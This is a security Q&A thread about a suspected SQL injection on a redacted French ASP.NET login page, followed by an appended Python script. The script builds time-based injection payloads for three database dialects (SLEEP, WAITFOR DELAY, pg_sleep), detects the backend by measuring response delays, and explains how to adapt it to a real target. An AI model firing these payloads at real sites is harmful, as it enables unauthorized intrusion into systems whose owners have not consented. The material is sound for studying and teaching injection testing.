I think I found an SQL vulnerability; the request and response can be found below. I'm not sure because it is showing a normal error (it's in French) instead of showing an SQL error.

I also tried to SQL inject the user page (after I logged in normally to the site) by adding a quote (') to a parameter, but I got the same normal error instead of the SQL one.

Could someone experienced tell me if this is an SQL error message and if an exploit is possible? If yes, how can someone exploit this?

GET /Anonym/Login.aspx?lnrid=636705509463187707" UNION SELECT SLEEP(30) -- &_lnPageGuid=0709206f-a5aa-40cf-bad7-78fb5452f5df&__EGClientState=NY&__VIEWSTATE=NY&__EVENTVALIDATION=%2FwEdAAivVXD1oYELeveMr0vHCmYPbKvSQfBZG4FRSb%2F8I7pm6gbzWSkUOVnL89VotOv3iwS9OtS9D9WQklHFFt9eID42Uj1o80q1QHHhR9Njbuhhm5HMJLG0qgnnIQHDWK64dEQaUDEQ2ba3nFNQp5gIEycdbMy1%2F4YQMXKqdpE3Qw%2F6%2Fw%3D%3D&egWindowManager%24clientWindow%24Oui=Oui&egWindowManager%24clientWindow%24Non=Non&egWindowManager%24clientWindow%24Ok=Ok&ctlUserCode=vega&ctlUserPassword=vega&ctlLogon=Connexion
Host: redacted
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-UA-Compatible: IE=edge
Date: Fri, 24 Aug 2018 07:37:32 GMT
Content-Length: 2082

[error page; only relevant parts:]
<body>
<form name="FrmErr" method="post" action="../PageErreur.aspx?lnrid=636705509463187707%22+UNION+SELECT+SLEEP(30)+--+&amp;_lnPageGuid=0709206f-a5aa-40cf-bad7-78fb5452f5df&amp;__EGClientState=NY&amp;egWindowManager%24clientWindow%24Oui=Oui&amp;egWindowManager%24clientWindow%24Non=Non&amp;egWindowManager%24clientWindow%24Ok=Ok&amp;ctlUserCode=vega&amp;ctlUserPassword=vega&amp;ctlLogon=Connexion" id="FrmErr">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTk3MzY5NzU2NmRk" />
</div>   
  <div class="Outer">
     <div class="Middle">
        <div class="Inner">
           <div class="ErrMsg">
              <table style="margin: auto;">
                 <tr>
                    <td><img id="ImgLogo" src="../Logo.gif" style="border-width:0px;" /></td>
                    <td>&nbsp;</td>
                    <td><br />Le site éprouve présentement des difficultés, nous sommes désolés du contretemps. [Translation: The site is currently experiencing difficulties; we apologize for the inconvenience.]</td>
                 </tr>
              </table>                  
              <hr width="60%" noShade="noShade" SIZE="0" />
           </div>
        </div>
     </div>
  </div>
</form>
schroeder
Adel M.
    Welcome Adel. I am taking the liberty of replacing your link with a request-response pair with redacted server info, out of respect for the site. It's not a good idea to link such a site from here; that will produce lots of traffic and maybe attacks. Please opt for any possible method of redacting data that is not important when you post questions here. – Tobi Nary Aug 24 '18 at 07:35
  • Personally, I don't find questions like "Could someone experienced tell me if this is an SQL error message and if an exploit is possible? If yes, how can someone exploit this?" ethical at all. It boils down to "can someone hack this site for me?" and smells even if the pretext is "pen-testing". – Your Common Sense Aug 24 '18 at 08:10
  • @YourCommonSense I'm not sure that I'm seeing an ethical problem. Any junior tester will take unusual responses to more senior testers for interpretation all the time. If the true intent is "hack this site for me", that's different. – schroeder Aug 24 '18 at 08:14
  • This is now a part of the site. We can't just "delete it" since there will be a history trail that will persist. Is there a reason why you want it deleted? – schroeder Nov 14 '20 at 08:22

1 Answer

Your error message is not really conclusive. It just states (if my French isn't as bad as I think it is) that the site encountered some kind of error. This may mean literally anything from "SQL returned an error" to "the backend's gone because a plane crashed into it".

Also you were trying to inject this:

" UNION SELECT SLEEP(30) --

What behaviour would you expect from a vulnerable site? In case your statement is syntactically correct, most likely you would expect an errorless return from the server after 30 seconds. So: did you measure the time?

Also: how did you conclude this is the correct syntax for whatever backend is used? There are multiple different SQL-based languages and interpreters, and choosing the wrong syntax will most likely produce errors independent of any applied filtering.

So your questions might be answered with:

Could someone experienced tell me if this is an SQL error message and if an exploit is possible?

No, it's most likely impossible on the basis of the information provided.

If yes, how can someone exploit this?

It most likely doesn't matter. If you manage to prove that SQL injection is possible (by either producing an actual SQL error or concluding it on a timing or error basis), there will probably be no reason to exploit it.

Just tell the owner ;)

Ben
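A worked version of the timing check the answer asks about, added here as an example; it is not code from the question or the answer. It builds the delay payload in three dialects (MySQL `SLEEP`, Microsoft SQL Server `WAITFOR DELAY`, PostgreSQL `pg_sleep`), measures the median response time against a baseline request, and runs against a simulated backend so it works offline. Assumptions: that `lnrid` is the injectable parameter and is used in a numeric (unquoted) context, and the simulated backend's behaviour (a valid delay in its own dialect sleeps; anything else lands on the generic error page with HTTP 200, exactly as in the captured response). Two things worth noticing: the question's payload opens with a double quote on what looks like a numeric id, which is a syntax error in every dialect, so no delay would be expected even from a vulnerable page; and the response headers show IIS/ASP.NET, which is usually paired with Microsoft SQL Server, where `SLEEP()` does not exist and `WAITFOR DELAY` must be a separate stacked statement.

```python
import re
import time
from statistics import median

# Seconds the sleeping payloads ask for. Tiny so the demo runs fast; a real
# test uses something like 10-30 s so network jitter cannot mimic it.
DELAY = 0.3

# Baseline id and the exact payload from the question's request.
BASELINE = "636705509463187707"
QUESTION_PAYLOAD = BASELINE + '" UNION SELECT SLEEP(30) -- '

# Generic error text from the captured response (roughly: "the site is
# currently having difficulties, sorry for the inconvenience").
ERROR_PAGE = ("Le site éprouve présentement des difficultés, "
              "nous sommes désolés du contretemps.")


def sleep_payload(dialect, seconds):
    """Delay primitive per backend, written for a numeric (unquoted) context.
    MySQL and PostgreSQL can sleep inside an expression; on SQL Server
    WAITFOR is a statement, so it needs a stacked query."""
    if dialect == "mysql":
        return f"{BASELINE} AND SLEEP({seconds})"
    if dialect == "mssql":
        return f"{BASELINE}; WAITFOR DELAY '0:0:{seconds}'--"
    if dialect == "postgresql":
        return f"{BASELINE} AND 1=(SELECT 1 FROM pg_sleep({seconds}))"
    raise ValueError(f"unknown dialect {dialect!r}")


class SimulatedBackend:
    """Stand-in for the login page (assumption, not the real site): lnrid is
    concatenated into SQL, so a valid delay in *this backend's* dialect delays
    the response; any other non-numeric input raises a database error that
    the application hides behind its generic error page (HTTP 200)."""

    PATTERNS = {
        "mysql": re.compile(r"\bSLEEP\(([\d.]+)\)", re.I),
        "mssql": re.compile(r"WAITFOR DELAY '0:0:([\d.]+)'", re.I),
        "postgresql": re.compile(r"pg_sleep\(([\d.]+)\)", re.I),
    }

    def __init__(self, dialect):
        self.dialect = dialect  # None models a page that parses lnrid as int

    def get(self, lnrid):
        if lnrid.isdigit():
            return 200, "normal login page"
        if self.dialect is None or '"' in lnrid:
            # Not injectable, or an unbalanced quote: a syntax error in any
            # dialect. Either way: generic error, no delay.
            return 200, ERROR_PAGE
        m = self.PATTERNS[self.dialect].search(lnrid)
        if m:
            time.sleep(float(m.group(1)))
            return 200, "normal login page"
        return 200, ERROR_PAGE  # wrong dialect -> SQL error -> generic page


def timed(backend, value, repeats=3):
    """Median wall-clock seconds over `repeats` requests with the same value.
    The median shrugs off a single slow request caused by jitter."""
    samples = []
    for _ in range(repeats):
        t0 = time.perf_counter()
        backend.get(value)
        samples.append(time.perf_counter() - t0)
    return median(samples)


def detect_dialect(backend, delay=DELAY, repeats=3):
    """Return the dialect whose sleep payload delays the response by roughly
    `delay` seconds over the baseline, or None if none of them does."""
    base = timed(backend, BASELINE, repeats)
    for dialect in ("mysql", "mssql", "postgresql"):
        elapsed = timed(backend, sleep_payload(dialect, delay), repeats)
        if elapsed - base >= 0.8 * delay:
            return dialect
    return None


if __name__ == "__main__":
    backend = SimulatedBackend("mssql")
    print("question's payload delay:",
          round(timed(backend, QUESTION_PAYLOAD) - timed(backend, BASELINE), 3))
    print("detected dialect:", detect_dialect(backend))
```

Against a real target, replace `SimulatedBackend.get` with the HTTP request and keep everything else: always measure the baseline first, repeat each payload a few times, and treat a delay as proof only if it scales with the number you asked for (5 s, then 10 s), since a single slow response proves nothing.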